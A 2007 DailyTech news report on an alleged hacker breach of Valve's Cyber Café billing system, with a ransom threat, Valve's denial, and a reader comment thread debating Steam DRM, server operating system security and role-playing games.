backtop


Print 82 comment(s) - last by SquidianLoveGo.. on May 3 at 10:00 PM



Screenshots posted by MaddoxX reveal the extent of the breach
Cafe owners are in trouble, and users who made online purchases may be next

Valve's STEAM content distribution system has been the target of no small share of bad press since it was created, with complaints ranging from apathetic customer service to the inability to play legitimately purchased games online. Some users have had their accounts locked, deleted, or hijacked - but a hacker known only as "MaddoxX" has just opened a rather sizeable can of worms.

According to a posting made on an anti-STEAM website, MaddoxX has bypassed Valve's security system and accessed a significant chunk of data, including:
  • Screenshots of internal Valve web pages
  • A portion of Valve's Cafe directory
  • Error logs
  • Credit card information of customers
  • Financial information on Valve
While only the Cafe owners appear to be in immediate danger, MaddoxX claims to "have shell access everywhere," and has posted a list of login details for accounts on the Valve servers.  In addition, Maddox also reveals that private certificates for "People with a little bit of (sic) experience ... create their own 'fake' but working cafe / certificate."

It's not currently known how far-reaching the credit card breach is, but STEAM users who have purchased products online for electronic delivery would do well to keep an eye on their credit card statements for the next while, especially if MaddoxX makes good on a promise to release a "spreadsheet."

STEAM cafe owners worldwide are more than a little upset with the information already leaked. MaddoxX has posted emails received from cafe owners and operators:
Believe me, nobody wants to 'stick it to Valve' more than those currently in the cafe program. We're rubbing pennies together trying to make it from month to month, while Valve is making millions off of us ... All I ask is that you make some effort to edit cafe numerical details from any future release.

Please don't release the CC information, for the sake of the centers who are less informed.
MaddoxX does make one thing quite clear in his electronic manifesto:
If you want me to remove these files you can e-mail me at (address removed) and I prefer you come with something good unless you want me to expose ALL of the customers their information.
It seems that Valve is being held for ransom. If this is true, Valve may be in trouble, as California Senate Bill 1386 requires that credit card holders be informed of any breach of their information, and MaddoxX already knows exactly how much money they have available.

Update 04/19/2007: Doug Lombardi, director of marketing at Valve, contacted DailyTech with the following statement:
There has been no security breach of Steam. The alleged hacker gained access to a third-party site that Valve uses to manage the commercial partners in its Cyber Café program. This Cyber Café billing system is not connected to Steam. We are working with law enforcement agencies on this matter, and encourage anyone with more information to e-mail us at Catch_A_Thief@valvesoftware.com.


Comments     Threshold


This article is over a month old, voting and posting comments is disabled

Yup, I knew it.
By Captain Orgazmo on 4/19/2007 12:24:53 AM , Rating: -1
This is exactly the reason I refuse to buy games from online distribution systems. Unfortunately, they still force you to register your store-bought games on steam, meaning if they were to shut down, or experience a massive data loss, you would lose what you had legally bought. Infringing on consumer rights like how steam does, only encourages people to use pirated games. Same like StarForce, how dare they install their crap on your system... any game with that protection is given a death sentence before it is even available.




RE: Yup, I knew it.
By Justin Case on 4/19/2007 1:04:28 AM , Rating: 4
I expect you play Solitaire and Tetris a lot, then?

If "this" (meaning CC data theft) "is exactly the reason why you refuse to buy games from online distribution systems", I expect you also "refuse" to do any on-line shopping, or even use a CC to pay for groceries / meals / etc.. After all, CC data can just as easily be (and frequently is) stolen from any other database. For all you know, the guy at the restaurant where you last used your CC copied your name and number and is using them right now... to buy games on Steam. ;)

Games bought through Steam are cheaper, can be backed up, downloaded as many times as you want, installed on multiple computers, and they don't force you to keep any CD / DVD in the drive. If Valve "suffered major data loss" (which is kind of unlikely, when you run multiple mirrored RAIDs), they'd simply restore from the last backup and request recent CC activity from their bank. Do you also worry about your bank "suffering major data loss" and you losing all your money?

I for one have no complaints about Steam, on the contrary. As DRM goes, it's by far the most civilized version.

Now, if this turns out to be true, leaving CC info accessible via the net is a pretty dumb mistake. There's nothing wrong with using Windows on their servers; Windows Server with a good admin can be as secure as any other OS. And BSD / Linux / Solaris with a bad admin can be as secure as Windows 95.

I doubt they keep any CC info about individual users, though; I seem to recall that I have to re-enter my CC info each time I want to buy a game.


RE: Yup, I knew it.
By Runiteshark on 4/19/2007 2:01:20 AM , Rating: 2
quote:
There's nothing wrong with using Windows on their servers; Windows Server with a good admin can be as secure as any other OS. And BSD / Linux / Solaris with a bad admin can be as secure as Windows 95.


I totally disagree with you there. The primary problem with windows systems is the amount of buffer overflows, or other random exploits found on them. I'm not saying that nix or bsd doesn't have its share of exploits (proc race anyone?), but they are quite a few less then what is out for Windows. However you are correct, an attacker wouldn't be able to do anything if they did indeed secure their php setup properly (unless they had a mystical apache/IIS6 0day) as long as they couldn't get a shell there. However, once a shell is on that setup, if on nix or bsd systems, it is possible to prevent any further security breeches (root), whereas with windows, you are basically screwed. I'm defiantly not saying that sec can't be bypassed on the nix/bsd setups (php module inclusion exploits, 0days), but can be contained.

If you seriously think that Windows is a good choice for anything other then a workgroup or domain management os, take a stroll down any exploit website (milw0rm for example). Even the exploits that Microsoft warns about turns into 0days before Microsoft patches them.. As was with a recent one. At least with nix or bsd variants you can have much more control over user privileges (no exec, chrooted, jailed, control over what the exec, no compiling, etc) whereas with how IIS is set up, once someone has access, you are done.

The guy that had access to this box could so easily bot so many machines its not even funny, I don't know if you know about the .ani exploit (think wmf but worse) but it could so easily be included onto their main page with even that basic shell that its scary.


RE: Yup, I knew it.
By Justin Case on 4/19/2007 2:25:57 PM , Rating: 5
I don't know what planet you live on, but I can tell you that, on this one, several banks run their entire backbone on... Windows. I'm not saying it's an efficient way to do things (for starters, it's more expensive than the alternatives), but it is perfectly possible to have secure Windows-based systems (I'm talking NT / 2000 / Server, not XP Home or any of that crap, of course).

A properly configured web server won't let hackers in in the first place, and careful configuration of your firewall, users, NTFS permissions, and internal network permissions can do the rest (in other words, the same things a sane and competent admin would to in a Unix system). Server 2003's defaults are even pretty civilized (as long as you add a good firewall and get rid of IIS).

Obviously if you run a vanilla install of Apache (or, god forbid, IIS) and upload-enabled PHP on an administrator account on a FAT volume, on a LAN with file sharing enabled, without a (real) firewall, you're asking for trouble.

NTFS gives, if anything, a lot more control over file permissions than the most common *nix filesystems. 99.9% of people don't have a clue about NTFS or user permissions but then, 99.9% of people aren't server admins.

It's not the OS that makes a system secure, it's the admin. On a properly configured system, external attackers (or clients in general) shouldn't even be able to figure out the server's OS.

P.S. - Remember Valve was founded by ex-Microsoft guys, so I guess having 100% secure systems would go against their nature. ;-)


RE: Yup, I knew it.
By Neosis on 4/19/2007 8:37:30 PM , Rating: 2
quote:
NTFS gives, if anything, a lot more control over file permissions than the most common *nix filesystems. 99.9% of people don't have a clue about NTFS or user permissions but then, 99.9% of people aren't server admins.


".. most comman *nix filesystems .." I presume you mean ext3 and ReiserFS. You are right about these two, NTFS enables more advanced file permission settings than POSIX, however these are not commonly used in servers by experienced system admins. One of the important reason is the poor scalability for ext3. (maybe with htrees, it's ok)

For security features and scalability, NSS has many advantages over NTFS, though recently NTFS gained similar features like Access Based Enumeration. It is similar to visibiliy in NSS. No suprise if we think NTFS is a derivative of the Novell NetWare 2.x ACL mode.

Here you can see its features: http://en.wikipedia.org/wiki/Novell_Storage_Servic...


RE: Yup, I knew it.
By Justin Case on 4/19/2007 11:20:59 PM , Rating: 2
NTFS actually has a lot of tricks up its sleeves that aren't "officially" documented, but if you hang around the MS newsgroups you'll see that it can do pretty much anything you want (and a lot of things you don't ;-).


RE: Yup, I knew it.
By Ryanman on 4/19/2007 4:58:13 AM , Rating: 2
There's a huge difference between, say, Half-Life 2 and Homeworld. First- I do not have to connect my computer to the internet to play a damn game. When I want to play Half-Life 2 I want to turn off everything so I can play it on my max settings. too bad I have to run my antivirus, Steam, and my wireless utility. Steam alone isnt exactly a light stepper on the system. If i'm not playing the game online and Valve has aready sucked enough money out of the franchise to cure cancer, why should I have say "oh hey i'm playing a game i bought."
I don't mind having to hook up to the net for CS at all- it IS an online game already. but when i'm playing one of the best games ever made- one I would have willingly paid 100 bucks for, if not for steam, it chaps me pretty bad.
One of the reasons I bought Oblivion was because of it's complete lack of any protection. Ive never really been an RPG fan. Lo and behold the game was a godsend- my sister also purchased it for the 360. THANK you Bethesda/2k for making a game defintely worth the 8 hours I had to work to pay for it.


RE: Yup, I knew it.
By Schrag4 on 4/19/2007 10:37:11 AM , Rating: 2
Uh, you only have to be connected to the internet once to play single player games for the rest of time. Sure, you won't get updates, but wouldn't you need to *connect your computer to the internet* to get those?

Don't get me wrong, I have my share of complaints about steam, mainly because I have to keep re-installing it (and any games I play using Steam). Not only that, but I have been a victim of the "patch that breaks the game for a day" problem, that really sucks. However, I think your complaint about having to connect to the internet to play the game is kinda weak, because it's no hassle to you, and if you don't have a net connection, you can still play the game.


RE: Yup, I knew it.
By Justin Case on 4/19/2007 2:51:13 PM , Rating: 2
Your antivirus is unlikely to eat more than 0.1% of your CPU cycles, and Steam is perfectly dormant while games are running (it won't even download other games' updates, which is a bit annoying because I have bandwidth to spare). I don't know what your "wireless utility" is, but my guess is it won't make much difference to your system's speed, either. Windows services like PnP (that constantly checks for new USB devices, etc.) will eat a *lot* more CPU cycles (but probably still not enough to be relevant, especially if you have a dual-core or dual-CPU system).

And you don't need to have an internet connection to play HL2. Not every time, at least. On my system I don't remember HL2 ever complaining that my net connection was down (and I've played it offline lots of times). It probably needs to "phone home" once every few days, but not every time. And I got it through Steam, so it's not checking for the original CD, either.

Regarding the games you mentioned: the main difference between HL2 and Homeworld is that HL2 is very good and Homeworld is crap. Okay, HW:Cataclysm was terrific, but Homeworld 2 was even crappier than the first one. :-)

As to Oblivion, well, I am a RPG fan, I did buy it (special edition, too), and IMO it wasn't worth the money or the wait. It's a hack'n'slash game with a few bad, completely disconnected stories sprinkled on top, and possibly the most disappointing AI ever (partly due to all the pre-release hyping). The game feels less interactive than Ultima 7, which is 15 years old, and has less atmosphere than Morrowind (its predecessor). It does have nice graphics and generally fun combat, but I was expecting a RPG (meaning a believable, consistent, immersive "world simulator"), not a 3D version of Diablo. It was clearly designed for younger console gamers, not "old school" RPG fans. If only Valve would reunite the Origin / Looking Glass team and produce a real, polished, consistent RPG, based on Source... I can dream, can't I? :-)


RE: Yup, I knew it.
By SquidianLoveGod on 4/21/2007 11:11:49 AM , Rating: 3
quote:
Your antivirus is unlikely to eat more than 0.1% of your CPU cycles


That depends on the virus scanner in question.
Kaspersky stops scanning etc, if your busy playing a game etc.

quote:
the main difference between HL2 and Homeworld is that HL2 is very good and Homeworld is crap. Okay, HW:Cataclysm was terrific, but Homeworld 2 was even crappier than the first one. :-)


I disagree, there are thousands of Homeworld players around, Making your point that the game is crap, negated, I personally think Half Life 2 is crap, And StarCraft is the best thing going since slice cheese. Yet there are alot of Half Life 2/Source/CS players around. (Not as many as StarCraft and Brood wars though :P the Battle.net community is huge, and its a national korean sport!).

quote:
As to Oblivion, well, I am a RPG fan, I did buy it (special edition, too), and IMO it wasn't worth the money or the wait. It's a hack'n'slash game with a few bad, completely disconnected stories sprinkled on top, and possibly the most disappointing AI ever (partly due to all the pre-release hyping). The game feels less interactive than Ultima 7, which is 15 years old, and has less atmosphere than Morrowind (its predecessor). It does have nice graphics and generally fun combat, but I was expecting a RPG (meaning a believable, consistent, immersive "world simulator"), not a 3D version of Diablo. It was clearly designed for younger console gamers, not "old school" RPG fans. If only Valve would reunite the Origin / Looking Glass team and produce a real, polished, consistent RPG, based on Source... I can dream, can't I? :-)


Again I disagree, Oblivion is very much like its predecessor, except it takes the best of that game and improves on it, Graphics, AI, Quests, Immersion etc.
Try doing the Arena quest, Join a mages guild follow the quests etc and GET yourself involved in the game, its not a game that will make you get off your ass and make it immersive, thats something thats left up to the player, For Instance you are given the Kavatch quest to close down the oblivion gate, Instead I decided to goto Bruma and do the mages guild recommendation quests, travelled from town to town, Killed a few vampires, became rather powerful, finished the arena, so I decided to turn evil and kill everything I could.

Oblivion has a main story line, yet allot of other story lines, That you could continue doing, and forget about the main quest. And personally, I enjoy walking through a town and hear people chatter, etc. And it does have immersion on a higher level than morrowing 3. -If you want to prove me wrong, point something out, and make my day ;)
And comparing the morrowind series against the Diablo series shows, you haven't played or completed any of those games. -.-

(Note I have complete both morrowind 3 and Oblivion)


RE: Yup, I knew it.
By Justin Case on 4/22/2007 10:26:33 PM , Rating: 2
Actually, I have completed those and just about every other CRPG ever made (well, since 1987, at least). In other words, I've been playing these things (and, for a short while, developing them) since the time when you were, I suspect, a mere glint in you father's eye.

Oblivion is a hack'n'slash console game made for 9 year olds with Xboxes. It requires about 3 working neurons, and two of those die after a week from terminal boredom. Add some fan-made mods (ex., OOO) and that grows to maybe a month, but it still feels disjointed. Morrowind's world might have been dead, but it had atmosphere and consistency (BTW, there is no such thing as "Morrowind 3", let alone "Morrowing 3" - now that you've completed it, you might want to read the name on the box). Morrowind wasn't great (it was barely good) but it held promise. Which makes Oblivion even more disappointing.

Ultima 7 is probably the best CRPG ever made, but I suspect you've never played it (or System Shock, for that matter).

The differences in style between these games is not accidental; they are a result of the way each of them was planned, developed and playtested. Good RPGs need a strong driving vision and tons of playtesting by very different people. Oblivion was designed for consoles (and console players - specifically the ones that need a little arrow to guide them through the entire game), its "missions" were developed by separate teams (and put together at the end), and it was playtested only by its developers. Calling Oblivion a RPG is like calling Doom an intellectual stretegy simulator.

And no, Kaspersky AV does not "stop scanning if your [sic] busy playing a game". It will continue to work as always: scanning every file that is accessed by running processes. All real-time file protection scanners work that way, and they need almost no CPU cycles.


RE: Yup, I knew it.
By SquidianLoveGod on 5/3/2007 10:00:14 PM , Rating: 2
Actually I never played System Shock, I did play System Shock 2, And Morrowind 3 is what they call the Elder scrolls 3, so Morrowind 3 is good enough me.
And to me, I think Oblivion is far better than Morrowind 3 will ever be.
And I have been around computers for a few ages, I watched the rise and fall of the great 3Dfx, The introduction of the sound blaster, and the dawn of the Commodore 64, which was enjoyable as I could MAKE my own games in BASIC (Beginners all purpose symbolic instruction code).

"And no, Kaspersky AV does not "stop scanning if your [sic] busy playing a game". It will continue to work as always: scanning every file that is accessed by running processes. All real-time file protection scanners work that way, and they need almost no CPU cycles."
Yes it does, Have a look at it again and find the setting which allows the program to pause what it is doing when CPU cycles are being used.

"Ultima 7 is probably the best CRPG ever made"
And... Your full of shit.
Well in my opinion.
Other people may agree or disagree.

Also... Have you had your pap-smear? Your kinda' kranky madam'.


RE: Yup, I knew it.
By LatinMessiah on 4/24/2007 12:56:16 PM , Rating: 2
I don't think the main purpose of Steam is to make sure you payed for the game your playing. I think it's to keep track of what kind of games you play and how often you play them. This information might prove valuable to Valve's marketing department. Just a theory.


RE: Yup, I knew it.
By SailorRipley on 4/19/07, Rating: -1
RE: Yup, I knew it.
By Rockjock51 on 4/19/2007 12:24:01 PM , Rating: 5
Out of curiosity, what makes it different just because he isn't associated with Valve? An employee poses just as much risk to you as someone who has nothing to do with the company don't they? A guy in a dumpster looking for the old imprints of credit cards they use when your card doesn't scan right could do the same thing.


RE: Yup, I knew it.
By mindless1 on 4/23/2007 7:05:40 PM , Rating: 2
No you don't expect Solitaire and Tetris, you're just ignorant of other games that don't impose these problems, or are deliberately ignoring truth to make a deceitful argument. Which is it?

No, "this" isn't using credit cards in general, another deliberate attempt at deceitful argument, trying to twist a legitimate concern into a different unplausable angle.

Games bought through Steam do have the obvious disadvantage, to try and defend them shows bias. I'm not claiming that as an excuse for this hack, but trying to take their side is no better than trying to take the hacker's side, when the solution they imposed causes problems for those who PAID for the game, it ends up always being the customer who is effected and it shouldn't be, as they did PAY for the product.

Of course there is something wrong with using Windows on the servers. Windows Server is, like the other windows, continually being patched so at any given moment odds are high it is exploitable, and more importantly, actually targeted and exploited. No amount of nonsense about "good admin" makes it possible to secure a closed operating system's flaws. No matter how diligent one were to patch it, it's always a game of catch-up, racing to close a hole after it was ALREADY found. These holes are exactly what a deterimined hacker would use, not only looking at what an unpatched Windows is vulnerable to.


RE: Yup, I knew it.
By theteamaqua on 4/19/2007 2:10:54 AM , Rating: 2
quote:
RE: Yup, I knew it......


i totally agree man .. if i buy stuff anything, not just software from store.. i expect being able to install and do everything without having to register online.. thats what i hate about steam,

the problem is that more and more games use steam's service of distributing games... and the last thing i want is for steam to distribute majority of the games (say 100 games a year)...if that happens they can pretty much do anything they want and u cant do anything about it. like treating customer like crap ... pay monthly fee and crap


"We basically took a look at this situation and said, this is bullshit." -- Newegg Chief Legal Officer Lee Cheng's take on patent troll Soverain











botimage
Copyright 2014 DailyTech LLC. - RSS Feed | Advertise | About Us | Ethics | FAQ | Terms, Conditions & Privacy Information | Kristopher Kubicki